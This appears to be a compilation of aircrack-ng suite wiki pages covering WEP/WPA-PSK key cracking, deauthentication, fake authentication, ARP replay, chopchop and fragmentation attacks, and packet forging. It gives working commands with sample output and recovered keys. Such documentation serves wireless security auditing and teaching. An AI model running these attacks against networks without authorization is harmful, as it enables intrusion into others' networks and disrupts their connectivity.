Aircrack-ng

Description
aircrack is the 802.11 WEP and WPA-PSK keys cracking program that can recover this keys once
enough encrypted packets have been captured with airodump-ng. This part of the aircrack-ng suite
can perform various statistical attacks to discover WEP keys with small amounts of captured data.
For cracking WPA-PSK bruteforce and dictionary methods are included.

Screenshot

LEGEND
1 = Keybyte
2 = Depth of current key search
3 = Byte the IVs leaked
4 = Votes indicating this is correct

How does it work?

When cracking a WEP key, each byte of the key is (basically!) handled individually. With more or
less mathematics, the possibility that a certain byte in the key is guessed right goes up to 15%
when you catch the right IV, that is leaking the possibly correct byte. In short: The more data you
have, the more information you have to make some analysis and calculate the statistics, how
possible a certain key is.

Then aircrack adds this to his table. In our screenshot above, we can see, that at keybyte 0 the byte
0xAE has collected some votes, 50 in this case. So, mathematically, it is more possible that the key
starts with AE than with 11 (which is almost half as possible).

With this information, aircrack starts checking the most possible key and then searches its way
through the possibility table. If you tell aircrack to use fudge factor 2 (default, -f 2) it takes the
votes of the most possible byte, and checks all other possibilities which are at least half as possible
as this one.

So, its just simple math! ;)

Explaination of the Depth Field
Best explanation is an example.

You have the votes like in the screen shot above. For the first byte: AE(50) 11(20) 71(20) 10(12)
84(12)

Now you decide to use fudge factor 3, it takes the vote from the most possible byte AE(50):

50 / 3 = 16.666666

Aircrack will test all keys with vote > 16.6666, resulting in

AE, 11, 71

being tested, so we have a total depth of three:

0 / 3 AE(50) 11(20) 71(20) 10(12) 84(12)

When aircrack is testing keys with AE, it shows 0 / 3, if it has all keys tested with that byte, it
switches to the next one and displays:

1 / 3 11(20) 71(20) 10(12) 84(12)

Usage
aircrack-ng [options] <capture file(s)>

You can specify multiple input files (either in .cap or .ivs format). Also, you can run both airodump-
ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available.

Heres a summary of all available options:

Option Param. Description

-a amode Force attack mode (1 = static WEP, 2 = WPA-PSK).

If set, all IVs from networks with the same ESSID will be used. This option is also
-e essid
required for WPA-PSK cracking if the ESSID is not broadcasted (hidden).

-b bssid Select the target network based on the access points MAC address.

-p nbcpu On SMP systems: # of CPU to use.

-q none Enable quiet mode (no status output until the key is found, or not).

(WEP cracking) Restrict the search space to alpha-numeric characters only (020 -
-c none
0x7F).

-t none (WEP cracking) Restrict the search space to binary coded decimal hex characters.

(WEP cracking) Restrict the search space to numeric characters (030-039)

-h none
These keys are used by default in most Fritz!BOXes.

-d start (WEP cracking) Set the beginning the WEP key (in hex), for debugging purposes.
 (WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m
-m maddr
ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network.

(WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit
-n nbits
WEP, etc. The default value is 128.

(WEP cracking) Only keep the IVs that have this key index (1 to 4). The default
-i index
behaviour is to ignore the key index.

(WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for
-f fudge 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will
take more time, but with a higher likelyhood of success.

(WEP cracking) There are 17 korek statistical attacks. Sometimes one attack
-k korek creates a huge false positive that prevents the key from being found, even with
lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.

-x/-x0 none (WEP cracking) Disable last keybytes brutforce.

-x1 none (WEP cracking) Enable last keybyte bruteforcing (default).

-x2 none (WEP cracking) Enable last two keybytes bruteforcing.

-X none (WEP cracking) Disable bruteforce multithreading (SMP only).

(WEP cracking) This is an experimental single bruteforce attack which should only
-y none
be used when the standard attack mode fails with more than one million IVs

-w words (WPA cracking) Path to a wordlist or - without the quotes for standard in (stdin).

Usage Examples
The simplest case is to crack a WEP key. If you want to try this out yourself, here is a test file. The
key to the test file matches the screen image above, it does not match the following example.

aircrack-ng 128bit.ivs
Where:

128bit.ivs is the file name containing ivs.

The program responds:

Opening 128bit.ivs
Read 684002 packets.

# BSSID ESSID Encryption

1 00:14:6C:04:57:9B WEP (684002 IVs)

Choosing first network as target.

If there were multiple networks contained in the file then you are given the option to select which
one you want. By default, aircrack-ng assumes 128 bit encryption.

The cracking process starts and once cracked, here is what it looks like:
 Aircrack-ng 0.7 r130

[00:00:10] Tested 77 keys (got 684002 IVs)

KB depth byte(vote)
0 0/ 1 AE( 199) 29( 27) 2D( 13) 7C( 12) FE( 12) FF( 6) 39( 5) 2C( 3) 00( 0) 08( 0)
1 0/ 3 66( 41) F1( 33) 4C( 23) 00( 19) 9F( 19) C7( 18) 64( 9) 7A( 9) 7B( 9) F6( 9)
2 0/ 2 5C( 89) 52( 60) E3( 22) 10( 20) F3( 18) 8B( 15) 8E( 15) 14( 13) D2( 11) 47( 10)
3 0/ 1 FD( 375) 81( 40) 1D( 26) 99( 26) D2( 23) 33( 20) 2C( 19) 05( 17) 0B( 17) 35( 17)
4 0/ 2 24( 130) 87( 110) 7B( 32) 4F( 25) D7( 20) F4( 18) 17( 15) 8A( 15) CE( 15) E1( 15)
5 0/ 1 E3( 222) 4F( 46) 40( 45) 7F( 28) DB( 27) E0( 27) 5B( 25) 71( 25) 8A( 25) 65( 23)
6 0/ 1 92( 208) 63( 58) 54( 51) 64( 35) 51( 26) 53( 25) 75( 20) 0E( 18) 7D( 18) D9( 18)
7 0/ 1 A9( 220) B8( 51) 4B( 41) 1B( 39) 3B( 23) 9B( 23) FA( 23) 63( 22) 2D( 19) 1A( 17)
8 0/ 1 14(1106) C1( 118) 04( 41) 13( 30) 43( 28) 99( 25) 79( 20) B1( 17) 86( 15) 97( 15)
9 0/ 1 39( 540) 08( 95) E4( 87) E2( 79) E5( 59) 0A( 44) CC( 35) 02( 32) C7( 31) 6C( 30)
10 0/ 1 D4( 372) 9E( 68) A0( 64) 9F( 55) DB( 51) 38( 40) 9D( 40) 52( 39) A1( 38) 54( 36)
11 0/ 1 27( 334) BC( 58) F1( 44) BE( 42) 79( 39) 3B( 37) E1( 34) E2( 34) 31( 33) BF( 33)

KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ]

This key can then be used to connect to the network.

Now onto cracking WPA/WPA2 passphrases. Aircrack-ng can crack either types.

aircrack-ng -w password.lst *.cap

Where:

-w password.lst is the name of the password file. Remember to specify the full path if the file
is not located in the same directory.
*.cap is name of group of files containing the ivs. Notice in this case that we used the
wildcard * to include multiple files.

The program responds:

Opening wpa2.eapol.cap
Opening wpa.cap
Read 18 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 Harkonen WPA (1 handshake)

2 00:0D:93:EB:B0:8C test WPA (1 handshake)

Index number of target network ?

Notice in this case that since there are multiple networks we need to select which one to attack. We
select number 2. The program then responds:

Aircrack-ng 0.7 r130

[00:00:03] 230 keys tested (73.41 k/s)

KEY FOUND! [ biscotte ]

Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

EAPOL HMAC : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD

Now you have the passphrase and connect to the network.

Usage Tips

How to make guesses for which option to use

Primarily, you just see the beginning of the key: The votes for the first 5 keybytes are very good, so
you can assume they are at least 99.5% correct, and these bytes are for example: 75:47:99:22:50
then it is quite obvious, that the whole key may consist only of numbers, like the first 5 bytes, so it
MAY improve your cracking speed when using -t option to only try such keys. If the bytes are
37:30:31:33:36 (all numeric) it is sure a good idea to use -h option. And if the first few bytes are
something like 74:6F:70:73:65, you enter them in your hexeditor, and you see, this could be the
beginning of some word, then it seems like an ASCII key is used, thus you activate -c option to
check only printable ASCII keys.

Other Tips
To specify multiple multiple files at a time you can either use a wildcard such as * or specify each
file individually. IE aircrack-ng -w password.lst wpa.cap wpa2.eapol.cap

Determining the WPA/WPA2 passphrase is totally dependent on finding a dictionary entry which
matches the passphrase. So a quality dictionary is very important. You can search the Internet for
dictionaries to be used. There are many available.

As you have seen, if there are multiple networks in your files you need to select which one you want
to crack. Instead of manually do a selection, you can specify which network you want by essid or
bssid on the command line. This is done with the -e or -b parameters.

Another trick is to use John the Ripper to create a specific passwords for testing. Lets say you know
the passphrase is the street name plus 3 digits. Create a custom rule set in JTR and run something
like this:

john --stdout --wordlist=specialrules.lst --rules | aircrack-ng -e test -a 2 -w - /root/capture/wpa.cap

Usage Troubleshooting
Error message Please specify a dictionary (option -w): This means you have mispelt the file name
of the dictionary or it is not in the current directory. If the dictionary is located in another directory,
you must provide the full path to the dictionary.

aircrack-ng.txt Last modified: 2007/02/12 18:34 by darkaudax

Airdecap-ng

Description
With airdecap-ng you can decrypt WEP/WPA/WPA2 capture files. As well, it can be used to strip the
wireless headers from an unencrypted wireless capture.
Usage
airdecap-ng [options] <pcap file>

Option Param. Description

-l dont remove the 802.11 header

-b bssid access point MAC address filter

-k pmk WPA/WPA2 Pairwise Master Key in hex

-e essid target network ascii identifier

-p pass target network WPA/WPA2 passphrase

-w key target network WEP key in hexadecimal

Usage Examples
The following removes the wireless headers from an open network (no WEP) capture:

airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap

The following decrypts a WEP-encrypted capture using a hexadecimal WEP key:

airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap

The following decrypts a WPA/WPA2 encrypted capture using the passphrase:

airdecap-ng -e 'the ssid' -p passphrase tkip.cap

Usage Tips
For ESSIDs which contain spaces, put the ESSID in quotes: this contains spaces.

Usage Troubleshooting
None at this time.

airdecap-ng.txt Last modified: 2007/02/21 18:37 by darkaudax

Airmon-ng

Description
This script can be used to enable monitor mode on wireless card interfaces. It may also be used to
shut down (stop) interfaces as well. Entering the airmon-ng command without parameters will show
the interface status.

Usage
usage: airmon-ng <start|stop> <interface> [channel]

Where:

<start|stop> indicates if you wish to start or stop the interface. (Mandatory)

<interface> specifies the interface. (Mandatory)
[channel] optionally set the card to a specific channel.

Usage Examples

Typical Uses
To start wlan0 in monitor mode: airmon-ng start wlan0

To start wlan0 in monitor mode on channel 8: airmon-ng start wlan0 8

To stop wlan0: airmon-ng stop wlan0

To check the status: airmon-ng

Madwifi-ng driver monitor mode

This describes how to put your interface into monitor mode. After starting your computer, enter
iwconfig to show you the current status of the wireless interfaces. It likely looks similar the
following output.

Enter iwconfig:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11b ESSID:"" Nickname:""

Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:0 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
If you want to use ath0 (which is already used):

airmon-ng stop ath0

And the system will respond:

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Now, if you do iwconfig:

System responds:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

You can see ath0 is gone.

To start ath0 in monitor mode: airmon-ng start wifi0

System responds:

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Now enter iwconfig

System responds:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""

Mode:Monitor Frequency:2.457 GHz Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:15 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

You can see ath0 is in monitor mode.

If ath1/ath2 etc. is running then stop them first prior to all the commands above:

airmon-ng stop ath1

You can set the channel number by adding it to the end: airmon-ng start wifi0 9
Usage Tips
To confirm that the card is in monitor mode, run the command iwconfig. You can then confirm the
mode is monitor and the interface name.

For the madwifi-ng driver, the access point field from iwconfig shows your the MAC address of the
wireless card.

To determine the current channel, enter iwlist <interface name> channel. If you will be working
with a specific access point, then the current channel of the card should match that of the AP. In this
case, it is a good idea to include the channel number when running the initial airmon-ng command.

Usage Troubleshooting
Nothing at this time.

airmon-ng.txt Last modified: 2007/02/21 19:29 by darkaudax

Aireplay-ng

Description
Aireplay-ng is used to inject frames.

The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and
WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of
capturing WPA handshake data, fake authentications, Interactive packet replay, hand-crafted ARP
request injection and ARP-request reinjection. With the packetforge-ng tool its possible to create
arbitrary ARP request frames.

Most drivers needs to be patched to be able to inject, dont forget to read Installing drivers.

Usage of the attacks

It currently implements a set of five different attacks:

Attack 0: Deauthentication
Attack 1: Fake authentication
Attack 2: Interactive packet replay
Attack 3: ARP request replay attack
Attack 4: KoreK chopchop (CRC prediction)
Attack 5: Fragmentation
Fragmentation vs. Chopchop
Here are the differences between the fragmentation and chopchop attacks

Fragmentation

Pros

Can obtain the full packet length of 1500 bytes xor. This means you can subsequently pretty
well create any size of packet. Even in cases where less then 1500 bytes are collected, there
is sufficient to create ARP requests.
May work where chopchop does not.
Is extremely fast. It yields the xor stream extremely quickly when successful.

Cons

Need more information to launch it - IE IP address info. Quite often this can be guessed.
Better still, aireplay-ng assumes source and destination IPs of 255.255.255.255 if nothing is
specified. This will work successfully on most APs. So this is a limited con.
Setup to execute the attack is more subject to the device drivers. For example, Atheros does
not generate the correct packets unless the wireless card is set to the mac address you are
spoofing.
You need to be physically closer to the access point since if any packets are lost then the
attack fails.

Chopchop

Pros

May work where fragmentation does not work.

You dont need to know any IP information.

Cons

Cannot be used against every access point.

The maximum xor bits is limited to the length of the packet you chopchop against.
Much slower then the fragmentation attack

Usage Troubleshooting
This item applies to all modes of aireplay-ng.

Make sure there are no other VAPs running. There can be issues when creating a new VAP in
monitor mode and there was an existing VAP in managed mode.

You should first stop ath0 then start wifi0:

airmon-ng stop ath0

airmon-ng start wifi0

or

wlanconfig ath0 destroy

wlanconfig ath create wlandev wifi0 wlanmode monitor
aireplay-ng.txt Last modified: 2007/02/21 21:15 by darkaudax

Deauthentication

Description
This attack sends disassocate packets to one or more clients which are currently associated with a
particular access point. Disassociating clients can be done for a number of reasons:

Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for
this is cloaked.
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate
Generate ARP requests (Windows clients sometimes flush their ARP cache when
disconnected)

Of course, this attack is totally useless if there are no associated wireless clients.

Usage
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication
1 is the number of deauths to send (you can send muliple if you wish); 0 means send them
continuously
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted
then all clients are deauthenticated
ath0 is the interface name

Usage Examples

Typical Deauthentication
First, you determine a client which is currently connected. You need the MAC address for the
following command:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

Where:

-0 means deauthentication
1 is the number of deauths to send (you can send muliple if you wish)
-a 00:14:6C:7E:40:80 is the MAC address of the access point
-c 00:0F:B5:34:30:30 is the MAC address of the client you are deauthing
ath0 is the interface name
Here is what the ouput looks like:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

WPA/WPA2 Handshake capture with an Atheros

airmon-ng start ath0
airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (switch to another console)
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
(wait for a few seconds)
aircrack-ng -w /path/to/dictionary out.cap

Here the explaination of the above commands:

airodump-ng -c 6 bssid 00:14:6C:7E:40:80 -w out ath0

Where:

-c 6 is the channel to listen on

bssid 00:14:6C:7E:40:80 limits the packets collected to this one access point
-w out is the file prefix of the file name to be written
ath0 is the interface name

aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0

Where:

-0 means deauthentication attack

5 is number of groups of deauthentication packets to send out
-a 00:14:6C:7E:40:80 is MAC address of the access point
-c 00:0F:B5:AB:CB:9D is MAC address of the client to be deauthenticated
ath0 is the interface name

Here is what the output looks like from aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c

00:0F:B5:AB:CB:9D ath0

12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]

12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]
12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D]

ARP request generation with a Prism2 card

airmon-ng start wlan0
airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (switch to another console)
aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

After sending the ten batches of deauthentication packets, we start listening for ARP requests with
attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

If the driver is wlan-ng/, you should run the airmon-ng script (unless you know what to type)
otherwise the card wont be correctly setup for injection.

Usage Tips
It is usually more effective to target a specific station using the -c parameter.

The deauthentication packets are sent directly from your PC to the clients. So you must be
physically close enough to the clients for your wireless card transmissions to reach them.
Usage Troubleshooting
None at this time.

deauthentication.txt Last modified: 2007/02/21 20:21 by darkaudax

Fake authentication
This attack is only useful when you need an associated MAC address in attacks 2, 3, 4 (-h option)
and there is currently no associated client. However it is genereally better to use the MAC address of
a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT
generate ARP requests.

Also, subsequent attacks will likely perform better if you update the MAC address of the card, so
that it properly sends ACKs:

ifconfig ath0 down

ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

With patched madwifi-old CVS 2005-08-14, its possible to inject packets while in Managed mode
(the WEP key itself doesnt matter, as long as the AP accepts Open-System authentication). So,
instead of running attack 1, you may just associate and inject / monitor through the athXraw
interface:

ifconfig ath0 down hw ether 00:11:22:33:44:55

iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up

sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Then you can run attack 3 or 4 (aireplay-ng will automatically replace ath0 with ath0raw below):

aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0

aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0

Some access points require to reassociate every 30 seconds, otherwise our fake client is considered
disconnected. In this case, setup the periodic re-association delay:

aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

If this attacks seems to fail (aireplay-ng keeps sending authentication requests), MAC address
filtering may be in place. Also make sure that:

You are close enough to the access point.

 The driver is properly patched and installed.
The card is configured on the same channel as the AP.
The BSSID and ESSID (-a / -e options) are correct.
If Prism2, make sure the firmware was updated.

fake_authentication.txt Last modified: 2006/11/19 16:12

Interactive packet replay

This attack allows you to choose a given packet for replaying; it sometimes gives more effective
results than attack 3 (ARP-request reinjection).

You could use it, for example, to attempt the any data re-broadcast attack, which only works if the
AP actually reencrypts WEP data packets:

aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

You can also use attack 2 to manually replay WEP-encrypted ARP request packets, which size is
either 68 or 86 bytes (depending on the operating system):

aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Another good idea is to capture some traffic and then have a look at it with Wireshark. If two
packets are looking like a request and a response (One client sends a packet and very short time
later the receiver is answering to it) then it is a good idea to try to reinject the request packet to get
answers.

interactive_packet_replay.txt Last modified: 2007/01/03 19:49 by mister_x

ARP Request Replay Attack

Description
The classic ARP request replay attack is the most effective way to generate new initialization vectors
(IVs), and works very reliably. The program listens for an ARP packet then retransmits it back to the
access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. The
program retransmits the same ARP packet over and over. However, each ARP packet repeated by
the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key.

ARP is address resolution protocol: A TCP/IP protocol used to convert an IP address into a physical
address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an
ARP request onto the TCP/IP network. The host on the network that has the address in the request
then replies with its physical hardware address.
Usage
Basic usage:

aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Where:

-3 means standard arp request replay

-b 00:13:10:30:24:9C is the access point MAC address
-h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake
authentication)
ath0 is the wireless interface name

Replaying a previous arp replay. This is a special case of the interactive packet replay attack. It is
present here since it is complementary to the ARP requeste replay attack.

aireplay-ng -2 -r replay_arp-0219-115508.cap ath0

Where:

-2 means interactive frame selection

-r replay_arp-0219-115508.cap is the name of the file from your last successful ARP replay

ath0 is the wireless card interface name

Usage Example
For all of these examples, use airmon-ng to put your card in monitor mode first. You cannot inject
packets unless it is in monitor mode.

For this attack, you need either the MAC address of an associated client , or a fake MAC from attack
1. The simplest and easiest way is to utilize the MAC address of an associated client. This can be
obtain via airodump-ng. The reason for using an associated MAC address is that the access point will
only accecpt and repeat packets where the sending MAC address is associated.

You may have to wait for a couple of minutes, or even longer, until an ARP request shows up. This
attack will fail if there is no traffic.

Enter this command:

aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0

The system responds:

Saving ARP requests in replay_arp-0219-123051.cap

You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

Initally the last line will look similar to:

Read 39 packets (got 0 ARP requests), sent 0 packets...

Then when the attack is in progress, the zeroes show the actual counts as in the full sample above.
You can also confirm this by running airodump-ng to capture the IVs being generated. It should
show the data count increasing rapidly for the specific access point.

The second example we will look at is reusing the captured ARP from the example above. You will
notice that it said the ARP requests were being saved in replay_arp-0219-123051.cap. So rather
then waiting for a new ARP, we simply reuse the old ones with the -r parameter:

aireplay-ng -2 -r replay_arp-0219-123051.cap ath0

The system responds:

Size: 86, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:88:AC:82

0x0000: 0841 0000 0014 6c7e 4080 000f b588 ac82 .A....l~@.......
0x0010: ffff ffff ffff 7092 e627 0000 7238 937c ......p..'..r8.|
0x0020: 8011 36c6 2b2c a79b 08f8 0c7e f436 14f7 ..6.+,.....~.6..
0x0030: 8078 a08e 207c 17c6 43e3 fe8f 1a46 4981 .x.. |..C....FI.
0x0040: 947c 1930 742a c85f 2699 dabe 1368 df39 .|.0t*._&....h.9
0x0050: ca97 0d9e 4731 ....G1

Use this packet ? y

You say y and then your system will start injecting:

Saving chosen packet in replay_src-0219-123117.cap

You should also start airodump-ng to capture replies.

Sent 3181 packets...

At this point, if you have not already done so, start airmon-ng to capture the IVs being generated.
They data count should be inscreasing rapidly.

Usage Tips
When you are testing at home, to generate an ARP packet to initiate the ARP injection, simply ping a
non-existent IP on your network.

Usage Troubleshooting
See Tutorial: I am injecting but the IVs don't increase!

arp-request_reinjection.txt Last modified: 2007/02/19 19:37 by darkaudax

KoreK chopchop
This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even
work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the
plaintext. However, some access points are not vulnerable at all. Some may seem vulnerable at first
but actually drop data packets shorter that 60 bytes. If the access point drops packets shorter than
42 bytes, aireplay tries to guess the rest of the missing data, as far as the headers are predictable.
If an IP packet is captured, it additionally checks if the checksum of the header is correct after
guessing the missing parts of it. This attack requires at least one WEP data packet.

1. First, we decrypt one packet

aireplay-ng -4 ath0

If this isnt successful, in most cases the access point just drops the data because it does not know
the MAC which is sending it. In this case we have to use the MAC adress of a connected client which
is allowed to send data over the network:

aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0

2. Lets have a look at the IP address

tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Then, forge an ARP request The source IP (192.168.1.100) doesnt matter, but the destination IP
(192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station,
in case the access point is filtering unauthenticated traffic.

packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100

192.168.1.2 arp.cap

4. And replay our forged ARP request

aireplay-ng -2 -r arp.cap ath0

See ChopchopTheory

korek_chopchop.txt Last modified: 2007/01/22 22:12 by jeroenimo

Fragmentation Attack

Description
This attack, when successful, can obtain 1500 bits of PRGA (pseudo random generation algorithm).
This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be
used to generate packets with packetforge-ng which are in turn used for various injection attacks. It
requires at least one data packet needs to be received from the access point in order to initiate the
attack.

Basically, the program obains a small amount of keying material from the packet then attempts to
send ARP and/or LLC packets with known content to the access point (AP). If the packet is
successfully echoed back by the AP then a larger amount of keying information can be obtained from
the returned packet. This cycle is repeated a several times until 1500 bits of PRGA are obtained or
sometimes less then 1500 bits.

The original paper by Andrea Bittau at http://www.toorcon.org/2005/slides/abittau/paper.pdf

provides a much more detailed technical description of the technique.
Usage
aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0
Where:

-5 means run the fragmentation attack

-b 00:14:6C:7E:40:80 is access point MAC address
-h 00:0F:B5:AB:CB:9D is source MAC address of the packets to be injected
ath0 is the interface name

Optionally, the following filters can be applied:

-b bssid : MAC address, Access Point

-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit

Optionally, the following replay options can be set:

-k IP : set destination IP in fragments - defaults to 255.255.255.255

-l IP : set source IP in fragments - defaults to 255.255.255.255

Usage Example
Notes:

The source MAC address used in the attack must be associated with the access point. To do
this, you can use fake authentication or use a MAC address of existing wireless client.

For madwifi-ng drivers (Atheros chipset), you must change MAC address of your card to the
MAC address you will injecting with otherwise the attack will not work.

Essentially you start the attack with the following command then select the packet you want to try:

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0

Waiting for a data packet...

Read 96 packets...

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:0F:B5:AB:CB:9D
Source MAC = 00:D0:CF:03:34:8C

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ? y

The program responds (or similar):

Saving chosen packet in replay_src-0124-161120.cap

Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

You have successfully obtained the PRGA which is stored in the file named by the program. You can
now use packetforge-ng to generate one or more packets to be used for various injection attacks.

fragmentation.txt Last modified: 2007/02/13 02:50 by darkaudax

Packetforge-ng

Description
The purpose of packetforge-ng is to create encrypted packets that can subsequently be used for
injection. You may create various types of packets such as arp requests, UDP, ICMP and custom
packets. The most common use is to create ARP requests for subsequent injection.

To create an encrypted packet, you must have a PRGA (pseudo random genration algorithm) file.
This is used to encrypt the packet you create. This is typically obtained from aireplay-ng chopchop
or fragmentation attacks.

Usage
Usage: packetforge-ng <mode> <options>

Forge options:
-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
